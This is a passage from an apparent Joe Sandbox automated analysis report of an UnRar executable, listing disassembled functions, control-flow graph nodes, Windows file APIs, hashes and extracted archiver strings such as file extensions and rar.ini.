7ff7aacb3250 2604->2611 2612 7ff7aacc6aad-7ff7aacc6ab2 2604->2612 2605->2435 2607 7ff7aacc6ad6-7ff7aacc6adc 2605->2607 2607->2435 2608 7ff7aacc6ade-7ff7aacc6aea call 7ff7aacd6d34 2607->2608 2608->2435 2611->2504 2612->2611
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: rev
                                                            • API String ID: 3668304517-165162695
                                                            • Opcode ID: 8cf1e091fb7ce96344e41ebafffb6c9f714f88bb0928bebf012c2b343735b2ca
                                                            • Instruction ID: 3a6e2211e84e22269b11289ec28d9b6c875c457fe3a42c44023c7c4acc1f7e27
                                                            • Opcode Fuzzy Hash: 8cf1e091fb7ce96344e41ebafffb6c9f714f88bb0928bebf012c2b343735b2ca
                                                            • Instruction Fuzzy Hash: BB12FF62A0A782C1FA10EF25D5502ADE761FB84794F816271DB9C17BEADF3DE582C310
                                                            Function 00007FF7AACCCED8 Relevance: 10.7, APIs: 7, Instructions: 159fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2615 7ff7aaccced8-7ff7aacccf17 2616 7ff7aacccff4-7ff7aaccd001 FindNextFileW 2615->2616 2617 7ff7aacccf1d-7ff7aacccf25 2615->2617 2620 7ff7aaccd003-7ff7aaccd012 GetLastError 2616->2620 2621 7ff7aaccd014-7ff7aaccd017 2616->2621 2618 7ff7aacccf27 2617->2618 2619 7ff7aacccf2a-7ff7aacccf3b FindFirstFileW 2617->2619 2618->2619 2619->2621 2622 7ff7aacccf41-7ff7aacccf69 call 7ff7aacd252c 2619->2622 2623 7ff7aacccfec-7ff7aacccfef 2620->2623 2624 7ff7aaccd032-7ff7aaccd040 2621->2624 2625 7ff7aaccd019-7ff7aaccd021 2621->2625 2637 7ff7aacccf6b-7ff7aacccf87 FindFirstFileW 2622->2637 2638 7ff7aacccf8a-7ff7aacccf93 2622->2638 2626 7ff7aaccd111-7ff7aaccd13d call 7ff7aacf1050 2623->2626 2630 7ff7aaccd045-7ff7aaccd04d 2624->2630 2628 7ff7aaccd023 2625->2628 2629 7ff7aaccd026-7ff7aaccd02d call 7ff7aacb32dc 2625->2629 2628->2629 2629->2624 2630->2630 2632 7ff7aaccd04f-7ff7aaccd079 call 7ff7aacb33a4 call 7ff7aacd3c44 2630->2632 2651 7ff7aaccd0b2-7ff7aaccd10c call 7ff7aace34cc * 3 2632->2651 2652 7ff7aaccd07b-7ff7aaccd092 2632->2652 2637->2638 2640 7ff7aacccf95-7ff7aacccfac 2638->2640 2641 7ff7aacccfcc-7ff7aacccfcf 2638->2641 2644 7ff7aacccfae-7ff7aacccfc1 2640->2644 2645 7ff7aacccfc7 call 7ff7aacf0ed4 2640->2645 2641->2621 2643 7ff7aacccfd1-7ff7aacccfe0 GetLastError 2641->2643 2649 7ff7aacccfe2-7ff7aacccfe8 2643->2649 2650 7ff7aacccfea 2643->2650 2644->2645 2646 7ff7aaccd144-7ff7aaccd14b call 7ff7aacf6404 2644->2646 2645->2641 2649->2623 2649->2650 2650->2623 2651->2626 2654 7ff7aaccd094-7ff7aaccd0a7 2652->2654 2655 7ff7aaccd0ad call 7ff7aacf0ed4 2652->2655 2654->2655 2658 7ff7aaccd13e-7ff7aaccd143 call 7ff7aacf6404 2654->2658 2655->2651 2658->2646
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                            • String ID:
                                                            • API String ID: 474548282-0
                                                            • Opcode ID: f5432661e277ec00ccc6d4537d6621648369b45d4139135e065f2428384a9602
                                                            • Instruction ID: 10557d33b8908b370ecd8bcba15758ad786960308d799d54f92d988faa6efde6
                                                            • Opcode Fuzzy Hash: f5432661e277ec00ccc6d4537d6621648369b45d4139135e065f2428384a9602
                                                            • Instruction Fuzzy Hash: 3F61C562A0AB42D6FE21EF19E44027DA361FB84794F815271EB9D43BA9DF3CE452C710
                                                            Function 00007FF7AACB5D28 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 738COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: CMT
                                                            • API String ID: 3668304517-2756464174
                                                            • Opcode ID: 18e2c3dbb207e55847ce25bf1d4d45ef3bc0984084b25a90534b8d6b51c972ca
                                                            • Instruction ID: 8eb0bf459e045a538d925eeec6796335c524e48fc1b4d106f176974c82da29af
                                                            • Opcode Fuzzy Hash: 18e2c3dbb207e55847ce25bf1d4d45ef3bc0984084b25a90534b8d6b51c972ca
                                                            • Instruction Fuzzy Hash: 6572D126B0B781D6FB04EB70C4402FDA3A5FB54344FC60176DA1E536A6EF3AA55AC360
                                                            Function 00007FF7AACCC5F4 Relevance: 4.9, APIs: 3, Instructions: 409COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLast_invalid_parameter_noinfo_noreturn$Char
                                                            • String ID:
                                                            • API String ID: 3265667968-0
                                                            • Opcode ID: 29908b65e361d75b1143bbc25532d536fe73590dd1ac935316efa4a9315d46f5
                                                            • Instruction ID: ac238262739e10192b85555a0d098438c7897d1fab3dc70748cfb4b7d86e9037
                                                            • Opcode Fuzzy Hash: 29908b65e361d75b1143bbc25532d536fe73590dd1ac935316efa4a9315d46f5
                                                            • Instruction Fuzzy Hash: 8AF1E462E1E682C1FB21AF25D4402BEE3A1EB50794F866271DA9D17AE9DF3CD443C310
                                                            Function 00007FF7AACEAEC4 Relevance: .3, Instructions: 302COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0af6d54a532281eb9bed32b16da96a7e9ef3b3058a66158a238ec5db03be9e7
                                                            • Instruction ID: c022c9b785fc97ed181b304ed4f0476aad222384a647cc16550123e592be1ce2
                                                            • Opcode Fuzzy Hash: f0af6d54a532281eb9bed32b16da96a7e9ef3b3058a66158a238ec5db03be9e7
                                                            • Instruction Fuzzy Hash: 3BB1E0A2B067C9D2FE28EA65D6086F9A391FB54BC4F858036DE1D07752DF3CE1568310
                                                            Function 00007FF7AACCD814 Relevance: .1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID:
                                                            • API String ID: 3340455307-0
                                                            • Opcode ID: a3b6600a362291d30a5628af1bdf05b6d5f22220150d73381b43d09d7d14f05d
                                                            • Instruction ID: db86a7ff849f4063d78861084f81bb19130ddf4d640bc690f73fd2c38cda4d79
                                                            • Opcode Fuzzy Hash: a3b6600a362291d30a5628af1bdf05b6d5f22220150d73381b43d09d7d14f05d
                                                            • Instruction Fuzzy Hash: 75415C22B16A52C6FB65EF21E840779A242FBC5788F855031DE4D07764EE3CE053C710
                                                            Function 00007FF7AACBCA28 Relevance: 37.0, APIs: 5, Strings: 16, Instructions: 221COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ff7aacbca28-7ff7aacbcaad call 7ff7aace1fd0 call 7ff7aacb33a4 call 7ff7aaccc5f4 6 7ff7aacbcab2-7ff7aacbcac3 0->6 7 7ff7aacbcac5-7ff7aacbcad8 6->7 8 7ff7aacbcaf8-7ff7aacbcafa 6->8 11 7ff7aacbcaf3 call 7ff7aacf0ed4 7->11 12 7ff7aacbcada-7ff7aacbcaed 7->12 9 7ff7aacbcb00-7ff7aacbcb10 call 7ff7aace2084 8->9 10 7ff7aacbccf3-7ff7aacbccfb 8->10 9->10 24 7ff7aacbcb16-7ff7aacbcb1a 9->24 14 7ff7aacbcd2d-7ff7aacbcd54 call 7ff7aacf1050 10->14 15 7ff7aacbccfd-7ff7aacbcd11 10->15 11->8 12->11 16 7ff7aacbcd5b-7ff7aacbcd60 call 7ff7aacf6404 12->16 21 7ff7aacbcd13-7ff7aacbcd26 15->21 22 7ff7aacbcd28 call 7ff7aacf0ed4 15->22 26 7ff7aacbcd61-7ff7aacbcd66 call 7ff7aacf6404 16->26 21->22 21->26 22->14 28 7ff7aacbcb20-7ff7aacbcb2a call 7ff7aace18dc 24->28 33 7ff7aacbcd67-7ff7aacbcd6f call 7ff7aacf6404 26->33 34 7ff7aacbcb1c 28->34 35 7ff7aacbcb2c-7ff7aacbcb43 call 7ff7aace53f8 28->35 34->28 40 7ff7aacbcb45-7ff7aacbcb58 35->40 41 7ff7aacbcbbc-7ff7aacbcbc3 35->41 44 7ff7aacbcb5b-7ff7aacbcb63 40->44 42 7ff7aacbcbc9-7ff7aacbcbd5 41->42 43 7ff7aacbccdd-7ff7aacbcced call 7ff7aace2084 41->43 45 7ff7aacbcbda-7ff7aacbcc04 call 7ff7aace1f88 call 7ff7aace53a8 * 2 42->45 46 7ff7aacbcbd7 42->46 43->10 43->28 44->44 48 7ff7aacbcb65-7ff7aacbcb87 call 7ff7aacb33a4 call 7ff7aacbc8fc 44->48 63 7ff7aacbcc06-7ff7aacbcc0e 45->63 64 7ff7aacbcc15-7ff7aacbcc19 45->64 46->45 48->41 58 7ff7aacbcb89-7ff7aacbcb9c 48->58 60 7ff7aacbcbb7 call 7ff7aacf0ed4 58->60 61 7ff7aacbcb9e-7ff7aacbcbb1 58->61 60->41 61->33 61->60 63->64 66 7ff7aacbcc10 63->66 67 7ff7aacbcc2d-7ff7aacbcc4a call 7ff7aacbd19c 64->67 68 7ff7aacbcc1b-7ff7aacbcc26 64->68 66->64 72 7ff7aacbcc4d-7ff7aacbcc55 67->72 68->67 69 7ff7aacbcc28 68->69 69->67 72->72 73 7ff7aacbcc57-7ff7aacbcc68 call 7ff7aace53f8 72->73 73->43 76 7ff7aacbcc6a-7ff7aacbcc7d 73->76 77 7ff7aacbcc80-7ff7aacbcc88 76->77 77->77 78 7ff7aacbcc8a-7ff7aacbccac call 7ff7aacb33a4 call 7ff7aacbc8fc 77->78 78->43 83 7ff7aacbccae-7ff7aacbccc1 78->83 84 7ff7aacbccc3-7ff7aacbccd6 83->84 85 7ff7aacbccd8 call 7ff7aacf0ed4 83->85 84->85 86 7ff7aacbcd55-7ff7aacbcd5a call 7ff7aacf6404 84->86 85->43 86->16
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                            • String ID: *?.$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tbz;tbz2;tgz;txz;xz;z;zip;zipx;zst;tzst$EML$ERR$FG-$LOG$NUL$OFF$SND$VER$rar.ini$rar.log$stdin$stdin$switches=$switches_%ls=
                                                            • API String ID: 449872665-88337483
                                                            • Opcode ID: 6267e444c41d9af39348556cdd25e3d021dd02c7d207ce1d0e9719f748284b90
                                                            • Instruction ID: 5f243489a3db840a266ecec5cf3c81d8e3fc0ef71d86d6c8ee839fe12d65bd35
                                                            • Opcode Fuzzy Hash: 6267e444c41d9af39348556cdd25e3d021dd02c7d207ce1d0e9719f748284b90
                                                            • Instruction Fuzzy Hash: FB91C462A0A782C1FE10FB25E4401ADE361FF557A0F811275EAAD17AE9EF3DD546C320
                                                            Function 00007FF7AACDA0FC Relevance: 23.4, APIs: 3, Strings: 10, Instructions: 697COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACD97B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AACD98F0
                                                            • snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AACDA766
                                                              • Part of subcall function 00007FF7AACE4F58: WideCharToMultiByte.KERNEL32 ref: 00007FF7AACE4F89
                                                              • Part of subcall function 00007FF7AACFA08C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFA0CC
                                                              • Part of subcall function 00007FF7AACD961C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AACD97A7
                                                              • Part of subcall function 00007FF7AACFA260: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFA29D
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACDAC1B
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACDAC21
                                                              • Part of subcall function 00007FF7AACE4908: MultiByteToWideChar.KERNEL32 ref: 00007FF7AACE4935
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharConcurrency::cancel_current_taskMultiWide_invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn$snprintf
                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                            • API String ID: 3396569959-2291855099
                                                            • Opcode ID: c13a5eb0a00e232bccc1263437655337805f9f9e7171794635d9ad1c305fde2f
                                                            • Instruction ID: 60aa7e5c90fd644ea872a0ceaec3d7b3aca64aef2c7924ee7020f6a577295d3b
                                                            • Opcode Fuzzy Hash: c13a5eb0a00e232bccc1263437655337805f9f9e7171794635d9ad1c305fde2f
                                                            • Instruction Fuzzy Hash: D6629D22A1BA42D5FB20EB24D4542BDA361FB40B84FC25172DA5E476A9EF3CE546C360
                                                            Function 00007FF7AACDDA88 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 330COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                            • String ID: *.*$\\?\
                                                            • API String ID: 3587649625-3726515343
                                                            • Opcode ID: b0c5c0b6c3d2827f39fd2328d0fed0b2c68d2d861323d812b7d1a0e61af7cb86
                                                            • Instruction ID: 6fc6f2c8565b769c7bd62dfd8789e0cad76c936c4965ac52a41290d976e469b7
                                                            • Opcode Fuzzy Hash: b0c5c0b6c3d2827f39fd2328d0fed0b2c68d2d861323d812b7d1a0e61af7cb86
                                                            • Instruction Fuzzy Hash: E6D1D426F0B642D6FA21EB25D0543BEA761EB44788F864576DE5E036A6DF3CE442C320
                                                            Function 00007FF7AACBAAF8 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 278COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2227 7ff7aacbaaf8-7ff7aacbab3c 2228 7ff7aacbab41-7ff7aacbab48 2227->2228 2229 7ff7aacbab3e 2227->2229 2230 7ff7aacbab7f-7ff7aacbab86 2228->2230 2231 7ff7aacbab4a-7ff7aacbab52 2228->2231 2229->2228 2234 7ff7aacbab9f-7ff7aacbabb8 call 7ff7aacd1c64 2230->2234 2235 7ff7aacbab88-7ff7aacbab9a call 7ff7aacb9f80 2230->2235 2232 7ff7aacbab54 2231->2232 2233 7ff7aacbab57-7ff7aacbab5c 2231->2233 2232->2233 2233->2230 2236 7ff7aacbab5e-7ff7aacbab66 2233->2236 2242 7ff7aacbabd2-7ff7aacbabda 2234->2242 2243 7ff7aacbabba-7ff7aacbabcd call 7ff7aacb7058 2234->2243 2235->2234 2240 7ff7aacbab68 2236->2240 2241 7ff7aacbab6b-7ff7aacbab7d call 7ff7aacf3608 2236->2241 2240->2241 2241->2230 2241->2235 2246 7ff7aacbabdf-7ff7aacbabf7 call 7ff7aace53f8 2242->2246 2247 7ff7aacbabdc 2242->2247 2251 7ff7aacbac77-7ff7aacbac7f 2243->2251 2246->2251 2253 7ff7aacbabf9-7ff7aacbac01 2246->2253 2247->2246 2254 7ff7aacbac81 2251->2254 2255 7ff7aacbac84-7ff7aacbac96 call 7ff7aacf3608 2251->2255 2256 7ff7aacbac06-7ff7aacbac13 call 7ff7aace18d0 2253->2256 2257 7ff7aacbac03 2253->2257 2254->2255 2261 7ff7aacbae68-7ff7aacbae72 call 7ff7aace1ff0 2255->2261 2262 7ff7aacbac9c-7ff7aacbaca3 2255->2262 2256->2251 2266 7ff7aacbac15-7ff7aacbac1f call 7ff7aaccb134 2256->2266 2257->2256 2269 7ff7aacbae77-7ff7aacbae7c 2261->2269 2262->2261 2264 7ff7aacbaca9-7ff7aacbacb6 2262->2264 2267 7ff7aacbad4f-7ff7aacbada8 call 7ff7aace1fd0 call 7ff7aace1ff0 call 7ff7aacdd460 2264->2267 2268 7ff7aacbacbc-7ff7aacbace2 2264->2268 2266->2251 2277 7ff7aacbac21-7ff7aacbac42 call 7ff7aacb8d74 call 7ff7aaccb134 2266->2277 2306 7ff7aacbadbb-7ff7aacbadc4 call 7ff7aacdeb9c 2267->2306 2272 7ff7aacbace8-7ff7aacbacf0 2268->2272 2273 7ff7aacbae81-7ff7aacbae85 2269->2273 2274 7ff7aacbae7e 2269->2274 2272->2272 2278 7ff7aacbacf2-7ff7aacbad1a call 7ff7aacb33a4 call 7ff7aacd17d8 2272->2278 2279 7ff7aacbaec3-7ff7aacbaede call 7ff7aacc446c call 7ff7aacc52c8 call 7ff7aacc474c 2273->2279 2280 7ff7aacbae87-7ff7aacbae8b 2273->2280 2274->2273 2307 7ff7aacbac44-7ff7aacbac4c 2277->2307 2308 7ff7aacbac6d-7ff7aacbac72 call 7ff7aacb3250 2277->2308 2278->2267 2309 7ff7aacbad1c-7ff7aacbad2f 2278->2309 2302 7ff7aacbaee3-7ff7aacbaeea 2279->2302 2285 7ff7aacbaeb9-7ff7aacbaec1 call 7ff7aacce350 2280->2285 2286 7ff7aacbae8d-7ff7aacbae9c 2280->2286 2285->2302 2286->2279 2292 7ff7aacbae9e-7ff7aacbaea2 2286->2292 2292->2285 2298 7ff7aacbaea4-7ff7aacbaea8 2292->2298 2298->2279 2299 7ff7aacbaeaa-7ff7aacbaeb7 call 7ff7aacb9f80 2298->2299 2299->2302 2311 7ff7aacbaef8-7ff7aacbaf22 call 7ff7aacf1050 2302->2311 2312 7ff7aacbaeec-7ff7aacbaef3 call 7ff7aacbe42c 2302->2312 2323 7ff7aacbadc9-7ff7aacbadcb 2306->2323 2307->2308 2315 7ff7aacbac4e-7ff7aacbac6c call 7ff7aacb32dc 2307->2315 2308->2251 2318 7ff7aacbad31-7ff7aacbad44 2309->2318 2319 7ff7aacbad4a call 7ff7aacf0ed4 2309->2319 2312->2311 2315->2308 2318->2319 2324 7ff7aacbaf29-7ff7aacbaf2e call 7ff7aacf6404 2318->2324 2319->2267 2328 7ff7aacbadaa-7ff7aacbadb6 call 7ff7aace1ff0 2323->2328 2329 7ff7aacbadcd-7ff7aacbadd6 2323->2329 2335 7ff7aacbaf2f-7ff7aacbaf37 call 7ff7aacf6404 2324->2335 2328->2306 2332 7ff7aacbadd8-7ff7aacbadeb 2329->2332 2333 7ff7aacbae0b-7ff7aacbae30 call 7ff7aacdd560 2329->2333 2336 7ff7aacbae06 call 7ff7aacf0ed4 2332->2336 2337 7ff7aacbaded-7ff7aacbae00 2332->2337 2333->2269 2341 7ff7aacbae32-7ff7aacbae46 2333->2341 2336->2333 2337->2335 2337->2336 2343 7ff7aacbae61-7ff7aacbae66 call 7ff7aacf0ed4 2341->2343 2344 7ff7aacbae48-7ff7aacbae5b 2341->2344 2343->2269 2344->2343 2345 7ff7aacbaf23-7ff7aacbaf28 call 7ff7aacf6404 2344->2345 2345->2324
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: .part$.rar$.rar$AFUMD$FUADPXETK
                                                            • API String ID: 3668304517-2058463528
                                                            • Opcode ID: 2d39152e319951bd1ce4e438e6835127e6fa2b428a3d4c3c04c044c153d60f78
